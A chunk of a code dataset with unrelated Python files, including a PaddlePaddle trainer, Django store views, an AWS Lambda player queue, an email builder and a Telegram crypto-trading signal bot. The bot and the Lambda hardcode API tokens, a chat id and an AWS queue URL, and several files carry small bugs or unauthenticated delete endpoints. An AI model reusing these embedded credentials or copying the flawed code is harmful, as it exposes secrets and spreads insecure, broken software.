[]\n self.item = []\n for i in range(2, 70, 1):\n self.user.append(fluid.layers.data(name=\"slot_%d\" % i, shape=[1],\n dtype=\"int64\", lod_level=1))\n for j in range(70, 100, 1):\n self.item.append(fluid.layers.data(name=\"slot_%d\" % i, shape=[1],\n dtype=\"int64\", lod_level=1))\n self.avg_cost, prediction = bow_net(self.user, self.item, self.label)\n\n\ndef async_train(args):\n model = Model()\n optimizer = fluid.optimizer.SGD(learning_rate=1e-4)\n optimizer.minimize(model.avg_cost)\n place = fluid.CPUPlace()\n exe = fluid.Executor(place)\n exe.run(fluid.default_startup_program())\n data_set = fluid.DataFeedDesc(\"ctr.proto\")\n input_data_name = [model.label.name] + [x.name for x in model.user] + [x.name for x in model.item]\n print(input_data_name)\n data_set.set_use_slots(input_data_name)\n data_set.set_batch_size(args.batch_size)\n async_exe = fluid.AsyncExecutor()\n file_list = [\"./data_mod/%s\" % str(i) for i in os.listdir(\"./data_mod\")]\n epoch_num = args.num_passes\n thread = args.thread_num\n model_dir = args.model_output_dir\n if not os.path.isdir(args.model_output_dir):\n os.mkdir(args.model_output_dir)\n\n for i in range(epoch_num):\n async_exe.run(fluid.default_main_program(), data_set,\n file_list, thread, model.avg_cost, debug=True)\n #fluid.io.save_inference_model(model_dir, input_data_name, [loss], exe)\n\nif __name__ == '__main__':\n args = parse_args()\n async_train(args)\n","sub_path":"fluid/PaddleRec/ctr/train_with_async_exe.py","file_name":"train_with_async_exe.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"126077245","text":"import yeti\nimport asyncio\n\n\nclass SimpleAuto(yeti.Module):\n \"\"\"\n A simple drive-and-shoot autonomous mode.\n \"\"\"\n\n def module_init(self):\n self.drivetrain = self.engine.get_module(\"drivetrain\")\n self.cannon = self.engine.get_module(\"cannon\")\n\n async def autonomous_init(self):\n # Drive forward\n self.drivetrain.arcade_drive(.2, 0)\n await asyncio.sleep(1)\n\n # Stop\n self.drivetrain.arcade_drive(0, 0)\n await asyncio.sleep(.2)\n\n # Fire cannon\n await self.cannon.fire_cannon()\n","sub_path":"old code/Yeti-master/examples/basic_example/modules/simple_auto.py","file_name":"simple_auto.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31992920","text":"from django import template\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom rest_framework import status\n\nfrom .models import Product, Category, SubCategory, Purchase\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm\nfrom django.contrib.auth import update_session_auth_hash\nfrom .forms import RegistarForm, EditarPerfilForm, InserirProductoForm, InserirCategoriaForm, InserirSubCategoriaForm\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .serializers import ProductSerializer, CategorySerializer, SubCategorySerializer, ProductSubCategoryBrandSerializer, SubCategoryProductSerializer, CategorySubCategorySerializer\n\n\ndef loja(request):\n category = Category.objects.all()\n subcategory = SubCategory.objects.all()\n product = Product.objects.all()\n purchase = Purchase()\n purchase.user = request.GET.get('user')\n purchase.product = request.GET.get('product')\n search_term = ''\n\n\n if 'search' in request.GET:\n search_term = request.GET['search']\n product = product.filter(name__icontains=search_term)\n\n context = {'subcategory': subcategory, 'product': product, 'category': category, 'search_term': search_term, 'purchase': purchase}\n return render(request, 'loja/index.html', context)\n\n\ndef product(request, product_id):\n subcategory_two = SubCategory.objects.all()\n category_two = Category.objects.all()\n product = get_object_or_404(Product, pk=product_id)\n\n\n return render(request, 'loja/product-description.html', {'product': product, 'subcategory_two': subcategory_two, 'category_two': category_two})\n\n\ndef subcategory(request, subcategory_id):\n subcategory = get_object_or_404(SubCategory, pk=subcategory_id)\n product = Product.objects.all().filter(subcategory_id=subcategory)\n category = Category.objects.all()\n subcategory_two = SubCategory.objects.all()\n category_two = Category.objects.all()\n context = {'subcategory': subcategory, 'product': product, 'category': category, 'subcategory_two': subcategory_two, 'category_two': category_two}\n return render(request, 'loja/subcategory.html', context)\n\n\ndef category_subcategory_allproducts(request, category_id):\n category = get_object_or_404(Category, pk=category_id)\n subcategory = SubCategory.objects.all().filter(category_id=category)\n product = Product.objects.all()\n category_two = Category.objects.all()\n subcategory_two = SubCategory.objects.all()\n context = {'category': category, 'subcategory': subcategory, 'product': product, 'category_two': category_two, 'subcategory_two': subcategory_two }\n return render(request, 'loja/category.html', context)\n\n\ndef register(request):\n if request.method == 'POST':\n form = RegistarForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/loja/inicio')\n else:\n form = RegistarForm()\n\n context = {'form': form}\n return render(request, 'loja/register-form.html', context)\n\n\ndef profile(request):\n context = {'user': request.user}\n return render(request, 'loja/profile.html', context)\n\n\ndef editar(request):\n if request.method == 'POST':\n # instance=request.user saber que é o user que queremos\n form = EditarPerfilForm(request.POST, instance=request.user)\n\n if form.is_valid():\n form.save()\n return redirect('/loja/perfil')\n else:\n form = EditarPerfilForm(instance=request.user)\n context = {'form': form}\n return render(request, 'loja/edit-profile.html', context)\n\n\ndef change_password(request):\n if request.method == 'POST':\n # instance=request.user saber que é o user que queremos\n form = PasswordChangeForm(data=request.POST, user=request.user)\n\n if form.is_valid():\n form.save()\n # Para nao dar erro ou Anomino User isto serve para dar update ao User\n update_session_auth_hash(request, form.user)\n return redirect('/loja/perfil')\n else:\n form = PasswordChangeForm(user=request.user)\n context = {'form': form}\n return render(request, 'loja/change-password.html', context)\n\n\ndef insert_product(request):\n form = InserirProductoForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n\n\n context = {'form': form}\n\n return render(request, 'loja/product-form.html', context)\n\n\ndef insert_category(request):\n form = InserirCategoriaForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n\n context = {'form': form}\n\n return render(request, 'loja/category-form.html', context)\n\ndef insert_subcategory(request):\n form = InserirSubCategoriaForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n\n context = {'form': form}\n\n return render(request, 'loja/subcategory-form.html', context)\n\ndef purchases(request):\n purchase = Purchase.objects.all()\n context = {'purchase': purchase}\n return render(request, 'loja/purchases.html', context)\n\n\ndef restframework_links(request):\n return render(request, 'loja/admin-restframework.html')\n\n\ndef insert(request):\n return render(request, 'loja/insert-forms.html')\n\n\n# Rest Framework\n# APIView Product, Category, SubCategory -> List\nclass ProductList(APIView):\n def get(self, request):\n product = Product.objects.all()\n serializer = ProductSerializer(product, many=True)\n return Response(serializer.data)\n\n\nclass CategoryList(APIView):\n def get(self, request):\n category = Category.objects.all()\n serializer = CategorySerializer(category, many=True)\n return Response(serializer.data)\n\n\nclass SubCategoryList(APIView):\n def get(self, request):\n subcategory = SubCategory.objects.all()\n serializer = SubCategorySerializer(subcategory, many=True)\n return Response(serializer.data)\n\n\n# APIView Product, Category, SubCategory -> Details\nclass ProductDetails(APIView):\n def get(self, request, pk):\n product = Product.objects.get(pk=pk)\n serializer = ProductSubCategoryBrandSerializer(product, many=False)\n return Response(serializer.data)\n\n def post(self, request, pk):\n product = Product.objects.get(pk=pk)\n serializer = ProductSerializer(product, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.erros, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n product = Product.objects.get(pk=pk)\n serializer = ProductSerializer(product, many=False)\n if product:\n product.delete()\n return Response({})\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass CategoryDetails(APIView):\n def get(self, request, pk):\n category = Category.objects.get(pk=pk)\n serializer = CategorySubCategorySerializer(category, many=False)\n return Response(serializer.data)\n\n def post(self, request, pk):\n category = Category.objects.get(pk=pk)\n serializer = CategorySubCategorySerializer(category, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.erros, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n category = Category.objects.get(pk=pk)\n serializer = CategorySubCategorySerializer(category, many=False)\n if category:\n category.delete()\n return Response({})\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass SubCategoryDetails(APIView):\n def get(self, request, pk):\n subcategory = SubCategory.objects.get(pk=pk)\n serializer = SubCategoryProductSerializer(subcategory, many=False)\n return Response(serializer.data)\n\n def post(self, request, pk):\n subcategory = SubCategory.objects.get(pk=pk)\n serializer = SubCategoryProductSerializer(subcategory, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.erros, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n subcategory = SubCategory.objects.get(pk=pk)\n serializer = SubCategoryProductSerializer(subcategory, many=False)\n if subcategory:\n subcategory.delete()\n return Response({})\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)","sub_path":"GlobalPC/GlobalPC/loja/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"16020179","text":"# File: a4q1.py\n# Author: Jesse Ponugoti\n# NSID: vip670\n# Student ID: 11220274\n# Course: CMPT 145 L12\n\n\ndef fibonacci(n):\n\t'''\n\tPurpose:\n\t\tCalculate the fibonnaci sequence until the param n and print the series\n\t\tas its computed. Example of the sequence: 0,1,1,2,3,5,8,13,21,34,55,...\n\tPre-conditions:\n\t\t:param n: the number of elements in the fibonacci sequence\n\tPost-conditions:\n\t\tNone\n\tReturn:\n\t\tThe nth element in the fibonacci series00\n\t'''\n\tif n in range(2):\n\t\treturn n\n\treturn fibonacci(n - 1) + fibonacci(n - 2)\n\n\ndef moosonacci(n):\n\t'''\n\tPurpose:\n\t\tCalculate the moosonacci sequence until the param n and print the series\n\t\tas its computed. Example of the sequence: 0,1,2,3,6,11,20,37,68,125...\n\tPre-conditions:\n\t\t:param n: the number of elements in the moosonacci sequence\n\tPost-conditions:\n\t\tNone\n\tReturn:\n\t\tThe nth element in the moosonacci series\n\t'''\n\tif n in range(3):\n\t\treturn n\n\treturn moosonacci(n - 1) + moosonacci(n - 2) + moosonacci(n - 3)\n\n\ndef count(s, c, i):\n\t'''\n\tPurpose:\n\t\tCount the occurences of the char 'c' in the string 's' after the index 'i'\n\tPre-conditions:\n\t\t:param s: the input string to check for occurences of 'c'\n\t\t:param c: the char to check for the occurences of in 's'\n\t\t:param i: the index at which to start looking for occurences of 'c'\n\tPost-conditions:\n\t\tNone\n\tReturn:\n\t\tNumber of times the char 'c' occurs in the string 's' starting form the\n\t\tindex 'i'\n\t'''\n\tif i not in range(len(s)):\n\t\treturn 0\n\tif s[i] is c:\n\t\ti += 1\n\t\treturn 1 + count(s, c, i)\n\telse:\n\t\ti += 1\n\t\treturn 0 + count(s, c, i)\n\n\n#########################################################################################\n\n\n# Set elements to compute here\nlimit = 20\n\nprint(\"testing fibonacci...\")\n\nfor i in range(limit):\n\tprint(i+1, \"->\", fibonacci(i))\n\nprint(\"testing moosonacci...\")\n\nfor i in range(limit):\n\tprint(i+1, \"->\", moosonacci(i))\n\nprint(\"testing count...\")\n\nstrings = ['fibonacci', 'moosonacci', 'limitless', 'colorful', 'riveting', 'blanchard']\nchars = ['i', 'a', 'o', 'e', 'u', 'l']\n\nfor s in strings:\n\tfor c in chars:\n\t\tfor i in range(0, 9, 2):\n\t\t\tprint('str:', s, 'chr:', c, 'idx:', i, '->', count(s, c, i))\n\n","sub_path":"assignments/a4/a4q1.py","file_name":"a4q1.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"636320882","text":"\"\"\"\n-------------------------------------\n# -*- coding: utf-8 -*-\n# @Author : QG\n# @File : diameter_error.py\n# @Software: PyCharm\n-------------------------------------\n\"\"\"\n\nfrom joblib import Parallel\nfrom joblib import delayed\n\nfrom config import *\nfrom metrics import *\n\n\ndef _cal_diameter_error(d_max_len, d_max_len_arr, sd_max_len, sd_max_len_arr):\n \"\"\"\n\n calculate diameter error(DE)\n\n Args:\n d_max_len :\n d_max_len_arr :\n sd_max_len :\n sd_max_len_arr:\n\n Returns:\n\n \"\"\"\n ep_D = [0 for _ in range(20)]\n ep_SD = [0 for _ in range(20)]\n for item in d_max_len_arr:\n num = int(item / (d_max_len / 20))\n if num < 20:\n ep_D[num] += 1\n else:\n ep_D[19] += 1\n\n for item in sd_max_len_arr:\n num = int(item / (sd_max_len / 20))\n if num < 20:\n ep_SD[num] += 1\n else:\n ep_SD[19] += 1\n\n ep_D = np.array(ep_D, dtype='float32')\n ep_D /= np.sum(ep_D)\n ep_D = ep_D.tolist()\n ep_SD = np.array(ep_SD, dtype='float32')\n ep_SD /= np.sum(ep_SD)\n ep_SD = ep_SD.tolist()\n diameter_error = jsd(ep_D, ep_SD)\n\n return diameter_error\n\n\ndef cal_diameter_error(d_path, sd_path):\n \"\"\"\n\n calculate diameter error(DE) (main function)\n\n Args:\n d_path :\n sd_path:\n\n Returns:\n\n \"\"\"\n diameter, diameter_array = d_len(d_path)\n\n if not os.path.exists(USE_DATA):\n os.mkdir(USE_DATA)\n\n with open(f\"{USE_DATA}/diameter_array.txt\", \"r\") as output:\n diameter_array = eval(output.read())\n s_diameter, s_diameter_array = d_len(sd_path)\n\n diameter_error_ = _cal_diameter_error(diameter, diameter_array, s_diameter, s_diameter_array)\n\n print('Diameter Error: ', sd_path, diameter_error_)\n\n return diameter_error_\n\n\ndef count_d_path(d_path):\n \"\"\"\n\n calculate trajectory path\n\n Args:\n d_path :\n\n Returns:\n\n \"\"\"\n diameter_array = d_len(d_path)[1]\n\n if not os.path.exists(USE_DATA):\n os.mkdir(USE_DATA)\n with open(f\"{USE_DATA}/diameter_array.txt\", \"w\") as output:\n output.write(str(diameter_array))\n\n\nif __name__ == '__main__':\n count_d_path(f\"../data/{USE_DATA}/Trajectories/\")\n Parallel(n_jobs=4)(delayed(cal_diameter_error)(f\"../data/{USE_DATA}/Trajectories/\",\n f\"../data/{USE_DATA}/SD/sd_final_epsilon_{i}/\"\n ) for i in epsilon_list)\n","sub_path":"metrics/diameter_error.py","file_name":"diameter_error.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127381867","text":"'''\nScript to load players in given league into queue to be processed. Stores\nprocessed players into DynamoDB so that we don't process players multiple times in a day.\nDefault value will add players to queue once per day max, therefore only updating match details for that player once per\nday\n'''\nimport json\nimport datetime\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\n\nimport riotApiService\n\n\ndef lambda_handler(event, context):\n sqs_client = boto3.client('sqs')\n dynamo = boto3.resource('dynamodb')\n table = dynamo.Table('processedPlayers')\n\n player_entries = []\n\n # If no players supplied to add, get challenger players and add them to queue\n if 'playerIds' not in event:\n player_ids = riotApiService.get_player_ids_by_league(riotApiService.DEFAULT_LEAGUE, riotApiService.DEFAULT_QUEUE)\n\n for player in player_ids:\n player_entry = {'id': player}\n player_entries.append(player_entry)\n else:\n player_ids = event['playerIds']\n\n for playerId in player_ids:\n player_entry = {'id': playerId}\n player_entries.append(player_entry)\n\n for player_entry in player_entries:\n needs_processed = add_processed_player_to_dynamo(player_entry['id'], table)\n if needs_processed:\n sqs_client.send_message(QueueUrl='https://sqs.us-east-1.amazonaws.com/939727369643/playerEntries',\n MessageBody=json.dumps(player_entry))\n return {\"status\": \"Success\", \"numPlayersLoaded\": len(player_ids)}\n\n\n# Determine if player should be added to queue to check match history, returns try if player record was added or updated\ndef add_processed_player_to_dynamo(player_id, table):\n player_id = str(player_id)\n update_threshold_date = str(datetime.datetime.now() - datetime.timedelta(days=1))\n kce = Key('playerId').eq(player_id)\n fe = Attr('updatedAt').gt(update_threshold_date)\n existing_item = table.query(KeyConditionExpression=kce,\n FilterExpression=fe)['Items']\n if len(existing_item) == 0:\n item = {'playerId': player_id, 'updatedAt': str(datetime.datetime.now())}\n table.put_item(Item=item)\n return True\n else:\n print('Entry already exists')\n return False\n","sub_path":"lambdas/loadPlayersIntoQueue/loadPlayersIntoQueue.py","file_name":"loadPlayersIntoQueue.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"406903246","text":"import mimetypes\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.image import MIMEImage\nfrom email.mime.text import MIMEText\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n## v:/workspace/HandlingEmail_Homework/python-logo.png\n\ndef sendemail(address, body, attachments=[]):\n msg = MIMEMultipart()\n msg['From'] = 'paul.refalo@gmail.com'\n msg['To'] = address\n msg['Subject'] = \"Python email system testing\"\n msg['Body'] = body\n msg.attach(MIMEText(body))\n \n for path in attachments:\n ctype, encoding = mimetypes.guess_type(path)\n if ctype is None or encoding is not None:\n # No guess could be made, or the file is encoded (compressed), so\n # use a generic bag-of-bits type.\n ctype = 'application/octet-stream'\n maintype, subtype = ctype.split('/', 1)\n if maintype == 'text':\n fp = open(path)\n # Note: we should handle calculating the charset\n att = MIMEText(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'image':\n fp = open(path, 'rb')\n att = MIMEImage(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'audio':\n fp = open(path, 'rb')\n att = MIMEAudio(fp.read(), _subtype=subtype)\n fp.close()\n else:\n fp = open(path, 'rb')\n att = MIMEBase(maintype, subtype)\n att.set_payload(fp.read())\n fp.close()\n # Encode the payload using Base64\n encoders.encode_base64(msg)\n # Set the filename parameter\n msg.add_header('Content-Disposition', 'attachment', filename=path)\n msg.attach(att)\n \n return msg\n \n \nif __name__ == '__main__':\n #print(sendemail('paul.refalo@gmail.com', 'Body of the email', ['walt.txt']))\n \n print(sendemail('paul.refalo@gmail.com', 'Body of the email', ['walt.txt', 'logo.png']))\n \n #print(sendemail('paul.refalo@gmail.com', 'Body of the email', 'python-logo.png'))\n ","sub_path":"python2/HandlingEmail_Homework/src/Email12.py","file_name":"Email12.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"345021945","text":"test_timer = 0\ntimer = 0\n#!/usr/bin/env python\n# coding: utf-8\n#Kütüphaneler\nimport os\nimport warnings\nwarnings.simplefilter(\"ignore\")\nimport pandas as pd\nimport numpy \nimport requests # veri çekme\nfrom datetime import datetime #tarih değişkenleri\nimport time\nimport talib # teknik analiz indikatörleri için \nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nimport plotly.express as pexp\nimport inspect\nimport databaseFile\n\nAPI_KEY = \"2012983454:AAFXcFFZs5oY6nUkhKOPUu8k02ZdqRHJA-Q\"\nimport telebot\nbot = telebot.TeleBot(API_KEY)\nchat_id = -541027529\nbot.config[\"api_key\"] = API_KEY\nprint('program is running..')\n\n\n\ni=0\nlast_buy_signal = {\"BTC\":0,\"ETH\":0,\"CAKE\":0,\"NEO\":0,\"BNB\":0,\"BAKE\":0,\"DOT\":0,\"EOS\":0,\"ETC\":0,\"ADA\":0,\"BCH\":0,\"LTC\":0,\"XRP\":0,\"DOGE\":0,\"SOL\":0,\"LUNA\":0}\nlast_sell_signal = {\"BTC\":0,\"ETH\":0,\"CAKE\":0,\"NEO\":0,\"BNB\":0,\"BAKE\":0,\"DOT\":0,\"EOS\":0,\"ETC\":0,\"ADA\":0,\"BCH\":0,\"LTC\":0,\"XRP\":0,\"DOGE\":0,\"SOL\":0,\"LUNA\":0}\nbuy_signal = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\nsignal_time = []\nsell_signal = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\nsymbols = [\"BTC\",\"ETH\",\"CAKE\",\"NEO\",\"BNB\",\"BAKE\",\"DOT\",\"EOS\",\"ETC\",\"ADA\",\"BCH\",\"LTC\",\"XRP\",\"DOGE\",\"SOL\",\"LUNA\"]\nyenicoin = [\"avax\",\"uni\",\"algo\",\"link\",\"atom\",\"icp\",\"matic\",\"one\",\"rose\",\"xlm\",\"trx\",\"xtz\",\"theta\",\"egld\",\"xmr\",\"aave\",\"miota\",\"btt\",\"dash\",\"chz\",\"mana\",\"enj\",\"bat\",\"rvn\",\"ont\",\"kava\",\"sxp\",\"dent\",\"sun\"]\nyenicoin1 = [stri.upper() for stri in yenicoin] \n[last_buy_signal.__setitem__(strii,0) for strii in yenicoin1]\n[last_sell_signal.__setitem__(strii,0) for strii in yenicoin1]\nbuy_signal.extend(list(numpy.zeros(len(yenicoin))))\nsell_signal.extend(list(numpy.zeros(len(yenicoin))))\nsymbols.extend(yenicoin1)\nprint('coin counter: ' + str(len(symbols)))\n\ndef lastReader():\n for item in symbols:\n last_buy_signal[item] = databaseFile.selectSignal(databaseFile.connector,item,\"buy\")\n for item in symbols:\n last_sell_signal[item] = databaseFile.selectSignal(databaseFile.connector,item,\"sell\")\ndef reshaper():\n symbols_infunc = [\"BTC: \",\"ETH: \",\"CAKE: \",\"NEO: \",\"BNB: \",\"BAKE: \",\"DOT: \",\"EOS: \",\"ETC: \",\"ADA: \",\"BCH: \",\"LTC: \",\"XRP: \",\"DOGE: \",\"SOL: \",\"LUNA: \",\"AVAX: \",\"UNI: \",\"ALGO: \",\"LINK: \",\"ATOM: \",\"ICP: \",\"MATIC: \",\"ONE: \",\"ROSE: \",\"XLM: \",\"TRX: \",\"XTZ: \",\"THETA: \",\"EGLD: \",\"XMR: \",\"AAVE: \",\"MIOTA: \",\"BTT: \",\"DASH: \",\"CHZ: \",\"MANA: \",\"ENJ: \",\"BAT: \",\"RVN: \",\"ONT: \",\"KAVA: \",\"SXP: \",\"DENT: \",\"SUN: \"]\n for i in range(0,len(symbols)):\n buy_signal[i] = str(databaseFile.selectTime(databaseFile.connector,symbols[i],\"sell\"))+\"---->\"+symbols_infunc[i] + str(databaseFile.selectSignal(databaseFile.connector,symbols[i],\"buy\"))\n with open(\"buy_signals.txt\", \"w\", encoding=\"utf-8\") as file:\n for item in buy_signal:\n file.write(str(item))\n file.write(\"\\n\") \n for i in range(0,len(symbols)):\n sell_signal[i] = str(databaseFile.selectTime(databaseFile.connector,symbols[i],\"sell\"))+\"---->\"+symbols_infunc[i] + str(databaseFile.selectSignal(databaseFile.connector,symbols[i],\"sell\"))\n with open(\"sell_signals.txt\", \"w\", encoding=\"utf-8\") as file:\n for item in sell_signal:\n file.write(str(item))\n file.write(\"\\n\")\ndef get_data(coin,money=\"USDT\",api = '114982364c3cb0a2410f7a8871ce4dff8af75a024ae9ca5500e413c11d9ed843',day_hour = \"hour\"):\n # print(coin,end=\": \")\n #api = input(\"Enter your api adress : \")\n #day_hour = input('Choose your time interval(day/hour) : ')\n frame = inspect.currentframe()\n global valuess\n args, _, _, valuess = inspect.getargvalues(frame)\n \n if day_hour == \"day\": \n url_day = \"https://min-api.cryptocompare.com/data/histoday\"\n load = {\"api_key\":api,\"fsym\":coin,\"tsym\":money,\"limit\":672}\n result = requests.get(url = url_day,params = load).json()\n global data_day\n data_day = pd.DataFrame(result[\"Data\"])\n #return data_day.iloc[:6,]\n if day_hour ==\"hour\":\n url_hour = \"https://min-api.cryptocompare.com/data/histohour\"\n load = {\"api_key\":api,\"fsym\":coin,\"tsym\":money,\"limit\":672}\n result = requests.get(url = url_hour,params = load).json()\n global data_hour\n data_hour = pd.DataFrame(result[\"Data\"])\n #return data_hour.iloc[:6,]\n\n \ndef date_transform(time):\n datetime1 = datetime.fromtimestamp(time);datetime1 = str(datetime1)\n datetime_son = datetime.strptime(datetime1,'%Y-%m-%d %H:%M:%S')\n return datetime_son\n\n\n\n\ndef get_volume(coin,money = \"USDT\",api = \"1989798748:AAHRBAP34mVJ1bIvCpRfgs17XTr_SegAtnU\",day_hour = \"hour\"):\n url_vol = \"https://min-api.cryptocompare.com/data/exchange/histohour\"\n\n api = \"114982364c3cb0a2410f7a8871ce4dff8af75a024ae9ca5500e413c11d9ed843\"\n load = {\n \"api_key\":api,\n \"fsym\":coin,\n \"tsym\":money,\n \"limit\":672}\n\n result = requests.get(url = url_vol,params= load).json()\n global volume\n volume = pd.DataFrame(result[\"Data\"])\n\n\n\n\nlastReader()\nwhile True:\n if time.localtime().tm_min==timer or time.localtime().tm_min==test_timer:\n print(\"*****************************************\")\n print(\"REQUESTING.......\")\n print(\"*****************************************\")\n for items in symbols:\n get_data(items)\n get_volume(items)\n \n #hacim datasının ana veriye eklenmesi\n data_hour[\"volume\"] = volume[\"volume\"]\n #VWMA\n data_hour[\"V*P\"] = data_hour[\"volume\"]*data_hour[\"close\"]\n data_hour[\"VWMA30\"]=data_hour[\"V*P\"].rolling(window = 30).sum()/data_hour[\"volume\"].rolling(window = 30).sum()\n #gereksiz kolonları şutlake\n #data_hour.drop([\"volumefrom\",\"volumeto\",\"conversionType\",\"conversionSymbol\",\"V*P\"],axis = 1,inplace = True)\n\n data_hour[\"time\"] = data_hour[\"time\"].apply(lambda x: date_transform(x))\n short_ema9 = talib.EMA(data_hour[\"close\"],9)\n ema_vwma_dict = {\"EMA9\":short_ema9,\"VWMA30\":data_hour[\"VWMA30\"]}\n ema_vwma = pd.DataFrame(ema_vwma_dict)\n buy = []\n sell = []\n flag = 42\n\n for i in range(0, numpy.shape(ema_vwma)[0]):\n if ema_vwma[\"EMA9\"].iloc[i] < ema_vwma[\"VWMA30\"].iloc[i]:\n buy.append(numpy.nan)\n if flag != 1:\n sell.append(ema_vwma[\"EMA9\"].iloc[i])\n flag = 1\n else:\n sell.append(numpy.nan)\n\n elif ema_vwma[\"EMA9\"].iloc[i] > ema_vwma[\"VWMA30\"].iloc[i]:\n sell.append(numpy.nan)\n if flag != 0:\n buy.append(ema_vwma[\"EMA9\"].iloc[i])\n flag = 0\n else:\n buy.append(numpy.nan)\n else:\n buy.append(numpy.nan)\n sell.append(numpy.nan)\n\n # Buy-Sell datası oluşturma\n buysell_data = {\"Time\": data_hour[\"time\"], \"Buy\": buy, \"Sell\": sell}\n result = pd.DataFrame(buysell_data)\n index = result.iloc[:, 1:].dropna(how=\"all\").index\n result = result.iloc[index,]\n if result[\"Buy\"][0:1].isna().bool() == True:\n result = result.drop([min(index)])\n\n if numpy.isnan(result.iloc[result.shape[0] - 1,][\"Buy\"]) == False:\n databaseFile.sql_update(databaseFile.connector,items,str(result[\"Time\"].iloc[-1]),round((result.iloc[result.shape[0] - 1,][\"Buy\"]),3),status=\"buy\")\n databaseFile.sql_update(databaseFile.connector,items,str(result[\"Time\"].iloc[-1]),\"nosignal\",status=\"sell\")\n print(items+\": buy at ----> \"+str(round((result.iloc[result.shape[0] - 1,][\"Buy\"]),3)))\n if str(round(result.iloc[result.shape[0] - 1,][\"Buy\"], 3)) != str(last_buy_signal[items]):\n print(\"bot tetiklendi\")\n bot.send_message(chat_id,items+\": buy at --> \"+str(round((result.iloc[result.shape[0] - 1,][\"Buy\"]),3)))\n last_buy_signal[items] = round((result.iloc[result.shape[0] - 1,][\"Buy\"]),3)\n time.sleep(1)\n else:\n databaseFile.sql_update(databaseFile.connector, items, str(result[\"Time\"].iloc[-1]),round((result.iloc[result.shape[0] - 1,][\"Sell\"]), 3), status=\"sell\")\n databaseFile.sql_update(databaseFile.connector, items, str(result[\"Time\"].iloc[-1]), \"nosignal\", status=\"buy\")\n print(items+\": sell at ---->:\"+str(round((result.iloc[result.shape[0] - 1,][\"Sell\"]),3)))\n if str(round(result.iloc[result.shape[0] - 1,][\"Sell\"], 3)) != str(last_sell_signal[items]):\n print(\"bot tetiklendi\")\n bot.send_message(chat_id, items + \": sell at --> \" + str(round((result.iloc[result.shape[0] - 1,][\"Sell\"]), 3)))\n last_sell_signal[items] = round((result.iloc[result.shape[0] - 1,][\"Sell\"]),3)\n time.sleep(1)\n\n reshaper()\n time.sleep(80)\n \n","sub_path":"analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"472000304","text":"#dogs.py\n\n#此示例示意为属性和方法一起使用\n\nclass Dog:\n def eat(self, food):\n print(self.color, '的',\n self.kinds,'正在吃',food)\n\n#创建第一个对象\ndog1 = Dog()\ndog1.kinds = '京巴' #添加属性kinds\ndog1.color = '白色' #添加属性color\ndog1.color = '黄色' #改变color绑定关系\n#print(dog1.color,'的',dog1.kinds) #访问属性\ndog1.eat('骨头')\n\ndog2 = Dog()\ndog2.kinds = '牧羊犬'\ndog2.color = '灰色'\n#print(dog2.color,'的',dog2.kinds) #访问属性\ndog2.eat('包子')\n","sub_path":"Object Oriented/day01/04_dogs.py","file_name":"04_dogs.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417874011","text":"from jupyter_client.kernelspec import KernelSpecManager\n\nkernel_name = \"mips_asm\"\n\n\ndef uninstall_kernel():\n print(\"Uninstalling\", kernel_name, \"kernel...\")\n KernelSpecManager().remove_kernel_spec(kernel_name)\n print(kernel_name.capitalize(), \"kernel uninstallation complete\")\n\n\nif __name__ == '__main__':\n uninstall_kernel()\n","sub_path":"kernels/mips_asm/uninstall.py","file_name":"uninstall.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"395995914","text":"import random\n\nprint(\"Olá, qual o seu nome?\")\nuser_nome = input()\nprint(user_nome + \", você está pronta para jogar? As regras são as 